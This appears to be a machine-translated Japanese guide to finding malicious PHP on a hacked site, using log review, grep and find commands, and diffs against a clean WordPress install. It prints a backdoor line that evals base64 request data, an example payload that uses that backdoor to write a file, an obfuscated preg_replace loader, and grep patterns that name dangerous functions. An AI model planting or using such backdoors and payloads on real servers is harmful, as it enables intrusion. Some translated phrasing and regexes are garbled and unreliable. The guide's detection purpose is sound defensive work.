PHPサイトがハッキングされたことを確認する方法

私の友人のサイトが最近ハッキングされました。古いバージョンのIP。Boardが起動されました。そこにはローカルファイルインクルードの脆弱性があります。 この投稿はIP.Boardやその他のphpコードには当てられません。サーバーで潜在的に悪意のあるphpコードを見つける方法を示します。 最後に、攻撃者がハッキングされたサイトにアップロードできるものの例を示します。

アクセスログを確認する

どこかから始めるには、友人のハッキングされたサイトのアクセスログからいくつかのエントリを共有したいと思います。

IpreMOVED - - [01/Mar/2013:06:16:48 -0600] "POST /uploads/monthly_10_2012/view.php HTTP/1.1" 200 36 "-" "Mozilla/5.0" IpreMOVED - - [01/Mar/2013:06:12:58 -0600] "POST /public/style_images/master/profile/blog.php HTTP/1.1" 200 36 "-" "Mozilla/5.0"
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

サーバー上のアクセスログを頻繁に確認する必要がありますが、注意しないと、一見無害に見えるURLがすぐ過ぎてしまうことがあります。



上記の2つのファイルは、クラッカーによってダウンロードされたスクリプトです。2つのサーバー上のコードはおそらく異なるため、それらを取得する方法は大きな役割を果たしません。 ただし、この特定の例では、IP.Boardの古いバージョンの脆弱性が悪用され、攻撃者はカスタムダウンロードディレクトリやIP.Boardがキャッシュされたスキンの画像を保存するディレクトリなどの書き込み可能なディレクトリに独自のスクリプトを追加できました。 これは一般的な攻撃ベクトルであり、多くの人がこれらのディレクトリの権限を777に変更するか、書き込みアクセスを許可します。これについては後で詳しく説明します。



上記のログ行を詳しく見てみましょう、何もあなたをキャッチしませんか？



アクセスログでは、GETリクエストではなくPOSTリクエストに注意してください。

ほとんどのログは投稿データを保存しないため、おそらく攻撃者はアクセスログをより目立たなくしたかったのです。

悪意のあるPHPファイルの検出

サーバー上の疑わしいphpファイルを識別する方法はいくつかありますが、ここが最良の方法です。

ヒント：これらのコマンドをサイトのルートディレクトリから実行します。

最近変更されたPHPファイルを検索する

簡単なものから始めましょう。しばらくの間phpコードを変更していないとしましょう。次のコマンドは、先週変更された現在のディレクトリツリー内のすべてのphpファイルを検索します。 必要に応じてmtimeオプションを変更できます（たとえば、2週間以内にmtime -14）。

 find . -type f -name '*.php' -mtime -7
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

ハッキングされたサーバーは次の結果を返しました。

 ./uploads/monthly_04_2008/index.php ./uploads/monthly_10_2008/index.php ./uploads/monthly_08_2009/template.php ./uploads/monthly_02_2013/index.php
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

これらのスクリプトはすべて、攻撃者によってユーザーのダウンロードディレクトリにアップロードされました。

注：一定期間内にphpファイルを変更した場合、このコマンドは誤った結果を生成します。 次の方法がはるかに効果的です。

不審なコードですべてのPHPファイルを検索します。

これは最善のアプローチとはほど遠い、次のチームは攻撃スクリプトを含むphpファイルを探しています。 高度な検索を使用して、簡単に始めてより多くを取得します。



eval、base64_decode、gzinflate、またはstr_rot13を含む最初のファイルチェック。

 find . -type f -name '*.php' | xargs grep -l "eval *(" --color find . -type f -name '*.php' | xargs grep -l "base64_decode *(" --color find . -type f -name '*.php' | xargs grep -l "gzinflate *(" --color
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

ヒント：最初の検索パラメーターは検索ディレクトリで、ドットは現在のディレクトリ（およびすべてのサブディレクトリ）を意味します。 このパラメーターを既存のディレクトリ名に変更して、検索結果を減らすことができます。次に例を示します。

 find wp-admin -type f -name '*.php' | xargs grep -l "gzinflate *(" --color
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

grepから-lオプションを削除すると、一致したファイルのテキストが表示されます。 さらに進むには、この結合されたチームを利用します。これはより一般的です

 find . -type f -name '*.php' | xargs grep -l "eval *(str_rot13 *(base64_decode *(" --color
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

このコマンドは、 eval（str_rot13（base64_decode（

grep構文は非常に単純であり、ニーズに合わせて変更できます。 探している上記の式を見てください。これは「eval *（str_rot13 *（base64_decode *（ "

*に続くスペースは、ゼロ個以上のスペース文字を示します。 上記の式は、次の行に対して有効です。

 eval(str_rot13(base64_decode eval( str_rot13( base64_decode eval( str_rot13( base64_decode
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

ヒント：式を展開して、mail、fsockopen、pfsockopen、stream_socket_client、exec、system、passthruなど、悪意を持って使用できる機能を探します。 これらすべての値を1つのコマンドに結合できます。

 find . -type f -name '*.php' | xargs egrep -i "(mail|fsockopen|pfsockopen|stream_socket_client|exec|system|passthru|eval|base64_decode) *\("
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

注： grepではなくegrepを使用します。これにより、拡張正規表現を使用できます。

最後に、コードを非表示にする同様によく知られた方法を次に示します。

 preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'5b19fxq30jD8d/wp5C3tQoMx4CQ FILE GOES ON FOR A LONG TIME...... lnSELWEZJakW9R3f7+J+uYuFiiC318gZ9P8C'\x29\x29\x29\x3B",".");
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

preg_replaceでe修飾子を使用すると、このコードが実行されます。これは異常に見えますが、いくつかの16進文字コードを使用するのはbase64 php圧縮コードだけです。

\ x65 \ x76 \ x61 \ x6C \ x28 \ x67 \ x7A \ x69 \ x6E \ x66 \ x6C \ x61 \ x74 \ x65 \ x28 \ x62 \ x61 \ x73 \ x65 \ x36 \ x34 \ x5F \ x64 \ x65 \ x63 \ x6F \ x64 \ x65 \ x28はevalとして変換されます（gzinflate（base64_decode（ 、および\ x29 \ x29 \ x29 \ x3Bなど）））;



このコマンドは、preg_replaceの使用を見つけるのに役立ちます。

 find . -type f -name '*.php' | xargs egrep -i "preg_replace *\((['|\"])(.).*\2[az]*e[^\1]*\1 *," --color
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

ヒント：このコマンドの結果が大量に得られた場合は、結果をファイルに保存するか、 lessという別のプログラムにリダイレクトして、一度に1ページずつ結果を表示できます。 fキーは前方にスクロールし、qキーは終了します。

 find . -type f -name '*.php' | xargs grep base64_ | less find . -type f -name '*.php' | xargs grep base64_ > results.txt
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

上記の検索コマンドのいずれでも、同じことができます。



ヒント：最後に16進数のx29がありますか？ これは閉じ括弧であり、x3Bはセミコロンです。 これを確認するには、次を実行します。

 echo chr(hexdec('x29')); echo chr(hexdec('x3B')); // outputs );
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

findを使用して、さらに検証するためにphpファイルでこれらの16進コードを検索できます。

 find . -type f -name '*.php' | xargs grep -il x29
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

コードで16進値を使用していないことがわかっている場合、これは適切なアプローチです。

事実を述べる

ほとんどの方法は、他の攻撃者が既存のphpコードを簡単に変更できる場合、攻撃者がファイルを北にアップロードし、何らかの形のコード難読化を使用することを前提としています。 この場合、コードは自然に見え、既存のスクリプトのスタイルと一致するか、混乱する可能性があります。



この問題を解決するために、wordpress、vbulletin、IP.Boardなどの広範なphpスクリプトを使用する場合は、コードのクリーンコピーが必要です。 -すべて準備完了です。 そうでない場合は、gitまたは他のバージョン管理システムを使用して、コードのクリーンバージョンを取得できることを願っています。



この例では、wordpressを使用します。



wordpress-cleanフォルダが2つあります。このフォルダには、ダウンロードしたばかりのwordpressのコピーとwordpress-compromisedが含まれており、ファイルのどこかに脅威が含まれています。

 drwxr-xr-x 4 greg greg 4096 Mar 2 15:59 . drwxr-xr-x 4 greg greg 4096 Mar 2 15:59 .. drwxr-xr-x 5 greg greg 4096 Jan 24 15:53 wordpress-clean drwxr-xr-x 5 greg greg 4096 Jan 24 15:53 wordpress-compromised
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

次のコマンドを実行すると、インストールされているワードプレスと純粋なワードプレスの違いを見つけることができます。

 diff -r wordpress-clean/ wordpress-compromised/ -x wp-content
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

誰もが独自のテーマとプラグインを持っているため、wp-contentをこの検索から除外しました。

ヒント：比較には同じバージョンのワードプレスを使用してください。



検索結果は次のとおりです。

 diff -r -x wp-content wordpress-clean/wp-admin/includes/class-wp-importer.php wordpress-compromised/wp-admin/includes/class-wp-importer.php 302a303,306 > > if (isset($_REQUEST['x'])) { > eval(base64_decode($_REQUEST['x'])); > }
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

彼は悪意のあるコードを検出しました！

好奇心から...

攻撃者はこれらの3行のコードで何ができますか？ 最初に、攻撃者は有用な情報を見つけます。

 $payload = "file_put_contents(\"../../wp-content/uploads/wp-upload.php\", \"<?php\nphpinfo();\");"; echo base64_encode($payload); // output: ZmlsZV9wdXRfY29udGVudHMoIi4uLy4uL3dwLWNvbnRlbnQvdXBsb2Fkcy93cC11cGxvYWQucGhwIiwgIjw/cGhwCnBocGluZm8oKTsiKTs=
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

次に、GETまたはPOSTリクエストをhttp：/ /YOURSITE/wp-admin/includes/class-wp-importer.phpに送信し、上記で作成したスクリプトを含むパラメーターxを送信します。 実行の結果、ファイル/wp-content/uploads/wp-upload.phpが作成され、サーバーに関する情報が表示されます。 これは悪くないように見えますが、実際のところ、攻撃者は必要な任意のphpコードを実行できます。

注：これは、wp-content / uploadsディレクトリが書き込み可能な場合にのみ機能します。 ほとんどの場合、Webサーバーの設定に応じて、他のファイルの読み取り/書き込み権限を変更できます。

実行可能コードのダウンロードに使用できるディレクトリを常に探します。

上記の方法を使用すると、ブートディレクトリでphpコードを簡単に見つけることができます。 ワードプレスの場合、これは次のようになります。

 find wp-content/uploads -type f -name '*.php'
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

ヒント：これは、書き込み可能なディレクトリとその中のphpファイルを探す非常に単純なbashスクリプトです。 結果はresults.txtファイルに保存されます。 スクリプトは再帰的に動作します。

 #!/bin/bash search_dir=$(pwd) writable_dirs=$(find $search_dir -type d -perm 0777) for dir in $writable_dirs do #echo $dir find $dir -type f -name '*.php' done
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

ファイルにsearch_for_php_in_writableという名前を付け、実行権限を付与します

 chmod +x search_for_php_in_writable
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

このファイルをホームディレクトリに保存してから、次のコマンドを検索して実行するディレクトリに移動します。

 ~/search_for_php_in_writable > results.txt ~/search_for_php_in_writable | less
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

注：サイトが共有ホスティングでホストされており、Webサーバーが安全に構成されていない場合、攻撃を受けやすいのはサイトだけではない場合があります。 脆弱なサイトでのPHPシェルの一般的なロードは、基本的に攻撃者にファイルブラウザを提供するツールです。 このツールを使用して、サーバー上の書き込み可能なすべてのフォルダー（ダウンロードディレクトリなど）に攻撃スクリプトをダウンロードできます。

注：クラッカーは通常、phpコードを含む画像をダウンロードしようとするため、上記の方法を使用して他の拡張機能を確認してください。

 find wp-content/uploads -type f | xargs grep -i php find wp-content/uploads -type f -iname '*.jpg' | xargs grep -i php
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

信じられない？ このファイルはjpg画像としてハッキングされたサイトにアップロードされました。 バイナリデータと間違えられたようです。 より読みやすい形式の同じファイルを次に示します。



まだ読めない？ 私と同じように、より深くチェックしてください。 このコードはすべて、この関数を実行するように設計されています。

 if(!defined('FROM_IPB') && !function_exists("shutdownCallback") and @$_SERVER["HTTP_A"]=="b") { function shutdownCallback() { echo "<!--".md5("links")."-->"; } register_shutdown_function("shutdownCallback"); }
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

このスクリプトを無関係にする理由は、学習する必要があり、ブートディレクトリを確認する必要があることです。

興味がある場合、これはノードが脆弱かどうかを確認するためのテストシナリオであり、攻撃は後で発生します。

悪意のあるコードが他にどこに隠れているのでしょうか？

PHPコードが動的にページコンテンツを生成し、サイトがハッキングされた場合、攻撃者がデータベースに悪意のあるコードを書き込む可能性があります。 より徹底的なチェックを行うこともできます。



サイトにアクセスして、ページをロードした後、ソースHTMLコードを確認し、コンピューター上のどこかに保存します（mywebsite.txtなど）。 次のコマンドを実行します

 grep -i '<iframe' mywebsite.txt
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

ハッカーは多くの場合、ハッキングされたサイトにiframeを挿入し、サイト上のすべてのページをチェックします！

ヒント： firefoxのfirebug拡張機能を使用してリソースのhtmlコンテンツを表示します。攻撃者はjavasciptを使用してiframeを作成できます。ブラウザでページのソースコードを表示すると、ページの読み込み後にDOMが変更されるため表示されません。 また、Firefox用のLive HTTP Headers拡張機能もあり、現在のすべてのリクエストがページに表示されます。 これにより、Webリクエストが見やすくなりますが、そうではありません。

検索データベース

攻撃者がデータベースにコードを追加した可能性があります。 これは、スクリプトがプラグインなどのユーザーコードをデータベースに保存している場合にのみ発生します。 vBulletinも同様です。 これはまれですが、これを知っておく必要があります。 このケースでハッキングされた場合、攻撃者はサイトのデータを表示するテーブルにiframeを挿入する可能性があります。



この例では、mysqlまたはその派生物を使用します。



これを行うには、PHPMyAdminを使用します。これは私にとっては普通ではありません。コマンドラインツールを使用することを好みます。コードで使用できますが、このツールは検索に便利です。



個人的には、実稼働サーバーでPHPMyAdminを実行せず、データベースのコピーをダウンロードしてローカルサーバーで実行します。 データベースが大きい場合は、運用サーバーで小さなテキストを検索することはお勧めしません。



PHPMyAdminを開き、データベースを選択して「検索」をクリックします。 ％base64_％や％eval（％、および既に説明した他の組み合わせなどの文字列を検索できます。

Apacheを使用している場合は、.htaccessファイルを確認してください

Apache Webサーバーを使用している場合は、.htaccessファイルで疑わしい変更がないか確認してください。



auto_append_fileおよびauto_prepend_fileには、すべてのphpスクリプトの先頭または末尾に他のphpファイルが含まれます。攻撃者はこれらを使用してコードを含めることができます。

 find . -type f -name '\.htaccess' | xargs grep -i auto_prepend_file; find . -type f -name '\.htaccess' | xargs grep -i auto_append_file;
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

次のコマンドは、「http」を含む.htacessファイルのすべてのサブディレクトリを検索します。 検索の結果は、悪意のあるルールを含むすべてのリダイレクトルールのリストになります。

 find . -type f -name '\.htaccess' | xargs grep -i http;
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

一部の悪意のあるリダイレクトは、ユーザーエージェントに基づいています。 .htaccessファイルでHTTP_USER_AGENTの使用を探すとよいでしょう。 前のコマンドは簡単に変更できます。セミコロンの前にキーワードを変更するだけです。



セキュリティを強化するために、可能であれば、ディレクトリでの.htaccessの使用を無効にし、構成をメインのApache構成に移動します。

「実世界」で

それでは、なぜ人々はあなたのサイトをハックしたいのでしょうか？ 一部の人にとってはこれは趣味ですが、他の人にとっては収入源です。



ハッキングされたサイトにアップロードされた攻撃スクリプトの例を次に示します。 ポストオペレーションのみに基づいているため、この場合、ほとんどのWebサーバーログは役に立ちません。 投稿リクエストのログを取得できました。

 Array ( [lsRiY] => YGFsZWN2bXBCY21uLGFtbw== [eIHSE] => PNxsDhxNdV [mFgSo] => b2NrbmtsLzIwLG96LGNtbixhbW8= [dsByW] => PldRR1A8Y3BhamtnXWprYWlxPi1XUUdQPAg+TENPRzwgQ3BhamtnIkprYWlxID4tTENPRzwIPlFX QEg8RFU4IlRoImNlcGMiMywiMjIiQWgiY25rcSIwLCIyMj4tUVdASDwiCD5RQE1GWzwIPkA8CD5m a3Q8PmMianBnZD8ganZ2cjgtLWhndnh4aW5rYWlnbCxhbW8tdXIva2xhbndmZ3EtUWtvcm5nUmtn LUZnYW1mZy1KVk9OLW5rYCxyanIgPFRoImNlcGMiMywiMjIiQWgiY25rcSIwLCIyMj4tYzw+LWZr dDwIPi1APAg+cjxqY3JyZ2wuImNsZiJ1amdsInZqZyJgbXsicGdjYWpnZiJjZWNrbCJrbHZtInZq ZyJ2bXsiYG16IksiZG13bGYib3txZ25kIkxndGdwImpnY3BmIm1kImt2LHZqZyIicmptdm1lcGNy anEibWQidmpnImNwdmtkY2F2InZqY3YidWcidWdwZyJubW1pa2xlImRtcCIiY2xmIiJyY3FxZ2Yi UnducWciImVtbWYuImpnInFja2YuImlsZ2dua2xlImBncWtmZyJtd3AiZHBrZ2xmLCJKZyJqY3Ei InZjaWdsIiI+LXI8CD4tUUBNRls8CA== [GGhp] => a3ZAbFFTSlJSbFo= [AIQXa] => e3VWT2VvQ0hyS0ha )
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

悪意のあるスクリプトは、基本的にスパムゾンビであり、サーバーを使用して投稿リクエストでメールを送信するユーザーにメールを送信します。 各投稿リクエストのキーは変更される可能性があり、スクリプトは非常にリソースに富んでおり、インストールされている機能をチェックし、これに適応します。 たとえば、php mail（）が使用できない場合、ポート25にソケットを作成し、SMTP経由で直接電子メールを送信しようとします。



侵入者のデータの復号化に関心がある場合は、n9a2d8ce3という関数を使用します。 不思議なPOSTデータが宛先アドレスと電子メールの内容を添付しています。



この記事に記載されているアドバイスを使用すると、このようなスクリプトを簡単に見つけることができます。

おわりに

wordpressのような公開phpスクリプトを使用する場合は、基本的なインストールだけでなく、プラグインなどの拡張機能についても、重要な更新またはセキュリティ更新に注意してください。 ほとんどの攻撃者は、既知の脆弱性を持つ数千のサイトを見つけようとするため、脆弱な場合、最終的にはあなたを見つけます。



規約に取り組んでいる場合でも、使用するライブラリに脆弱性があるべきではないため、常にコードをチェックする必要があります。